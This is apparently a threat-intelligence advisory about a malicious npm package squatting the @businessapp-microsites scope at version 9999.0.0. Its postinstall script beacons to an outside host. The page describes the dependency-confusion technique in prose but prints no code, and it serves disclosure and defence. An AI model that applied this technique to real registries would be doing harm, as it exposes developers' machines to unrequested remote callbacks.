Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in @businessapp-microsites/apis (npm)

@businessapp-microsites/apis

Risk score

92

AI summary

Indexed incident for @businessapp-microsites/apis (npm).

Description

Package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 to outrank any internal version during dependency resolution. The package.json declares a postinstall script that runs node -e to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any npm install that resolves this scope from the public registry, the installer's machine performs an outbound callback that confirms execution and discloses the installer's source IP and the fact-of-install to a third-party host. The combination of an unregistered-scope squat, the 9999.0.0 version pin, and an install-time beacon to an external host is the canonical dependency-confusion attack pattern; researcher framing in the package metadata does not change the runtime behavior on any machine that installs it.

Technical details

Affected versions

=9999.0.0=9999.0.1

Indicators

  • affected version=9999.0.075%
  • affected version=9999.0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents